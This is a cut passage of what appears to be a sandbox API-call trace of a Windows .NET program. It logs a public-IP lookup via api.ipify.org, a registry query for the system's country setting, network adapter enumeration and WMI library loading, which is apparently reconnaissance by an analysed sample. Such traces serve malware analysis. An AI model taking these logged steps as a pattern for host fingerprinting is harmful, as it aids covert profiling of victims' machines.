(hInternet=0x7b7278, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0227.808] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x18a048 | out: pProxyConfig=0x18a048) returned 1 [0227.885] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x1898c0, nSize=0x80 | out: lpBuffer="뮜状馄\x18㋄瓜￿￿飼\x18륔璙礐犵⫬狫疽璇䘻쪃礐犵⫬狫\x02") returned 0x0 [0227.885] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x1898c0, nSize=0x80 | out: lpBuffer="뮜状馄\x18㋄瓜￿￿飼\x18륔璙礐犵⫬狫疽璇䘻쪃礐犵⫬狫\x02") returned 0x0 [0227.887] EtwEventRegister () returned 0x0 [0227.902] GetCurrentProcess () returned 0xffffffff [0227.902] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d14 | out: TokenHandle=0x189d14*=0x338) returned 1 [0227.904] GetCurrentProcess () returned 0xffffffff [0227.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d24 | out: TokenHandle=0x189d24*=0x348) returned 1 [0227.913] SystemFunction041 (in: Memory=0x7923f4, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x7923f4) returned 0x0 [0227.922] SetEvent (hEvent=0x244) returned 1 [0227.930] WinHttpGetProxyForUrl (in: hSession=0x7b7278, lpcwszUrl="http://api.ipify.org/", pAutoProxyOptions=0x189f7c, pProxyInfo=0x189fec | out: pProxyInfo=0x189fec) returned 0 [0230.540] GetCurrentProcess () returned 0xffffffff [0230.540] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189c90 | out: TokenHandle=0x189c90*=0x36c) returned 1 [0230.541] GetCurrentProcess () returned 0xffffffff [0230.541] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189ca0 | out: TokenHandle=0x189ca0*=0x378) returned 1 [0230.542] SetEvent (hEvent=0x244) returned 1 [0230.558] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x189ffc | out: pFixedInfo=0x0, pOutBufLen=0x189ffc) returned 0x6f [0230.588] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x7cd9e8 [0230.588] GetNetworkParams (in: pFixedInfo=0x7cd9e8, pOutBufLen=0x189ffc | out: pFixedInfo=0x7cd9e8, pOutBufLen=0x189ffc) returned 0x0 [0230.603] LocalFree (hMem=0x7cd9e8) returned 0x0 [0230.604] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x189804, nSize=0x80 | out: lpBuffer="ꑂ璙") returned 0x0 [0230.604] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x189804, nSize=0x80 | out: lpBuffer="ꑂ璙") returned 0x0 [0230.607] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x390 [0230.609] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x38c [0230.610] GetAddrInfoW (in: pNodeName="api.ipify.org", pServiceName=0x0, pHints=0x189eec*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x189e94 | out: ppResult=0x189e94*=0x7c5f18*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="elb097307-934924932.us-east-1.elb.amazonaws.com", ai_addr=0x7d3490*(sa_family=2, sin_port=0x0, sin_addr="107.22.251.25"), ai_next=0x7c6198*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3568*(sa_family=2, sin_port=0x0, sin_addr="54.225.66.103"), ai_next=0x7c61c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3580*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x7c61e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3598*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x7c6210*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d35b0*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x7c6238*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d0198*(sa_family=2, sin_port=0x0, sin_addr="54.235.83.248"), ai_next=0x7c6260*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d01b0*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x7c6288*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d01c8*(sa_family=2, sin_port=0x0, sin_addr="23.21.126.66"), ai_next=0x0))))))))) returned 0 [0230.667] FreeAddrInfoW (pAddrInfo=0x7c5f18*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="elb097307-934924932.us-east-1.elb.amazonaws.com", ai_addr=0x7d3490*(sa_family=2, sin_port=0x0, sin_addr="107.22.251.25"), ai_next=0x7c6198*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3568*(sa_family=2, sin_port=0x0, sin_addr="54.225.66.103"), ai_next=0x7c61c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3580*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x7c61e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3598*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x7c6210*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d35b0*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x7c6238*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d0198*(sa_family=2, sin_port=0x0, sin_addr="54.235.83.248"), ai_next=0x7c6260*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d01b0*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x7c6288*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d01c8*(sa_family=2, sin_port=0x0, sin_addr="23.21.126.66"), ai_next=0x0))))))))) [0230.667] GetAddrInfoW (in: pNodeName="api.ipify.org", pServiceName=0x0, pHints=0x189eec*(ai_flags=131072, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x189e94 | out: ppResult=0x189e94*=0x7c6288*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ipify.org", ai_addr=0x7d35b0*(sa_family=2, sin_port=0x0, sin_addr="107.22.251.25"), ai_next=0x7c6238*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3598*(sa_family=2, sin_port=0x0, sin_addr="54.225.66.103"), ai_next=0x7c6210*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3580*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x7c61e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3568*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x7c61c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3490*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x7c6198*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7bed10*(sa_family=2, sin_port=0x0, sin_addr="54.235.83.248"), ai_next=0x7c5f18*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7cf688*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x7c5b58*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7cf6a0*(sa_family=2, sin_port=0x0, sin_addr="23.21.126.66"), ai_next=0x0))))))))) returned 0 [0230.669] FreeAddrInfoW (pAddrInfo=0x7c6288*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ipify.org", ai_addr=0x7d35b0*(sa_family=2, sin_port=0x0, sin_addr="107.22.251.25"), ai_next=0x7c6238*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3598*(sa_family=2, sin_port=0x0, sin_addr="54.225.66.103"), ai_next=0x7c6210*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3580*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.47"), ai_next=0x7c61e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3568*(sa_family=2, sin_port=0x0, sin_addr="23.21.203.116"), ai_next=0x7c61c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7d3490*(sa_family=2, sin_port=0x0, sin_addr="54.235.182.194"), ai_next=0x7c6198*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7bed10*(sa_family=2, sin_port=0x0, sin_addr="54.235.83.248"), ai_next=0x7c5f18*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7cf688*(sa_family=2, sin_port=0x0, sin_addr="174.129.255.253"), ai_next=0x7c5b58*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x7cf6a0*(sa_family=2, sin_port=0x0, sin_addr="23.21.126.66"), ai_next=0x0))))))))) [0230.670] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3a0 [0230.670] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a4 [0230.670] ioctlsocket (in: s=0x3a0, cmd=-2147195266, argp=0x189ec4 | out: argp=0x189ec4) returned 0 [0230.670] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3a8 [0230.671] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3ac [0230.671] ioctlsocket (in: s=0x3a8, cmd=-2147195266, argp=0x189ec4 | out: argp=0x189ec4) returned 0 [0230.671] WSAIoctl (in: s=0x3a0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0) returned -1 [0230.671] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189bdc, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0230.671] WSAEventSelect (s=0x3a0, hEventObject=0x3a4, lNetworkEvents=512) returned 0 [0230.671] WSAIoctl (in: s=0x3a8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x189eac, lpOverlapped=0x0) returned -1 [0230.671] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189bdc, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0230.672] WSAEventSelect (s=0x3a8, hEventObject=0x3ac, lNetworkEvents=512) returned 0 [0230.672] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x189ea8*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x189ea8*=0x7e0) returned 0x6f [0230.678] LocalAlloc (uFlags=0x0, uBytes=0x7e0) returned 0x7cee38 [0230.678] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x7cee38, SizePointer=0x189ea8*=0x7e0 | out: AdapterAddresses=0x7cee38*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x7cf0fc, AdapterName="{89C47688-58E9-48ED-A232-2A7897FAD591}", FirstUnicastAddress=0x7cf070, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) PRO/1000 MT Network Connection #2", FriendlyName="Local Area Connection 2", PhysicalAddress=([0]=0x48, [1]=0x52, [2]=0x61, [3]=0xdd, [4]=0xd7, [5]=0x90, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000007000000, Dhcpv4Server.lpSockaddr=0x7cefb0*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x20, [5]=0xe8, [6]=0x2e, [7]=0xf0, [8]=0x0, [9]=0x60, [10]=0x38, [11]=0x9b, [12]=0xba, [13]=0x1, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x11006038, FirstDnsSuffix=0x0), SizePointer=0x189ea8*=0x7e0) returned 0x0 [0230.688] LocalFree (hMem=0x7cee38) returned 0x0 [0230.689] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x189ebc | out: phkResult=0x189ebc*=0x3b0) returned 0x0 [0230.690] RegQueryValueExW (in: hKey=0x3b0, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x189ed8, lpData=0x0, lpcbData=0x189ed4*=0x0 | out: lpType=0x189ed8*=0x0, lpData=0x0, lpcbData=0x189ed4*=0x0) returned 0x2 [0230.690] RegCloseKey (hKey=0x3b0) returned 0x0 [0230.690] WSAConnect (in: s=0x390, name=0x276a1e4*(sa_family=2, sin_port=0x50, sin_addr="107.22.251.25"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0230.860] closesocket (s=0x38c) returned 0 [0230.863] send (s=0x390, buf=0x276aea4*, len=63, flags=0) returned 63 [0230.864] setsockopt (s=0x390, level=65535, optname=4102, optval="\x10'", optlen=4) returned 0 [0230.865] recv (in: s=0x390, buf=0x2764e10, len=4096, flags=0 | out: buf=0x2764e10*) returned 184 [0231.040] setsockopt (s=0x390, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0231.040] SetEvent (hEvent=0x244) returned 1 [0231.122] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\International\\Geo", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a178 | out: phkResult=0x18a178*=0x38c) returned 0x0 [0231.127] RegQueryValueExW (in: hKey=0x38c, lpValueName="Nation", lpReserved=0x0, lpType=0x18a198, lpData=0x0, lpcbData=0x18a194*=0x0 | out: lpType=0x18a198*=0x1, lpData=0x0, lpcbData=0x18a194*=0x8) returned 0x0 [0231.127] RegQueryValueExW (in: hKey=0x38c, lpValueName="Nation", lpReserved=0x0, lpType=0x18a198, lpData=0x27755a4, lpcbData=0x18a194*=0x8 | out: lpType=0x18a198*=0x1, lpData="244", lpcbData=0x18a194*=0x8) returned 0x0 [0231.297] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b8 [0231.300] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189a50 | out: ppv=0x189a50*=0x766114) returned 0x0 [0231.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x188ce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0231.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x1891e0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll\x02ò\x18\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 63 [0231.327] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x73cf0000 [0231.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x189214, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1a\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 13 [0231.337] GetProcAddress (hModule=0x73cf0000, lpProcName="ResetSecurity") returned 0x73cf24de [0231.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x189214, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity\x02D\x1a\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 11 [0231.345] GetProcAddress (hModule=0x73cf0000, lpProcName="SetSecurity") returned 0x73cf2520 [0231.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x189210, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 18 [0231.353] GetProcAddress (hModule=0x73cf0000, lpProcName="BlessIWbemServices") returned 0x73cf1c69 [0231.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x189208, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1a\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 24 [0231.369] GetProcAddress (hModule=0x73cf0000, lpProcName="BlessIWbemServicesObject") returned 0x73cf1cbb [0231.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x189210, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1a\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 17 [0231.375] GetProcAddress (hModule=0x73cf0000, lpProcName="GetPropertyHandle") returned 0x73cf21b4 [0231.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x189210, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 18 [0231.388] GetProcAddress (hModule=0x73cf0000, lpProcName="WritePropertyValue") returned 0x73cf2617 [0231.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x18921c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1a\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 5 [0231.392] GetProcAddress (hModule=0x73cf0000, lpProcName="Clone") returned 0x73cf1d0d [0231.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x189210, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey\x02D\x1a\x0ftze\x9bÊ\x94Â\x86tØ\x94\x18", lpUsedDefaultChar=0x0) returned 15 [0231.395] GetProcAddress (hModule=0x73cf0000, lpProcName="VerifyClientKey") returned 0x73cf25b4 [0231.419] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x189a48 | out: pAptType=0x189a48*=1) returned 0x0 [0231.421] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x189a4c | out: ppvObject=0x189a4c*=0x0) returned 0x80004002 [0231.421] IUnknown:Release (This=0x766114) returned 0x0 [0231.434] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1896a4 | out: lpiid=0x1896a4) returned 0x0 [0231.435] CoGetClassObject (in: rclsid=0x7b5544*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1893b8 | out: ppv=0x1893b8*=0x5b20810) returned 0x0 [0231.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20810, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1895d0 | out: ppvObject=0x1895d0*=0x0) returned 0x80004002 [0231.468] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5b20810, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1895e4 | out: ppvObject=0x1895e4*=0x5b20820) returned 0x0 [0231.468] WbemDefPath:IUnknown:Release (This=0x5b20810) returned 0x0 [0231.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20820, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189204 | out: ppvObject=0x189204*=0x5b20820) returned 0x0 [0231.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20820, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1891c0 | out: ppvObject=0x1891c0*=0x0) returned 0x80004002 [0231.469] WbemDefPath:IUnknown:AddRef (This=0x5b20820) returned 0x3 [0231.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20820, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x188b1c | out: ppvObject=0x188b1c*=0x0) returned 0x80004002 [0231.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20820, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x188acc | out: 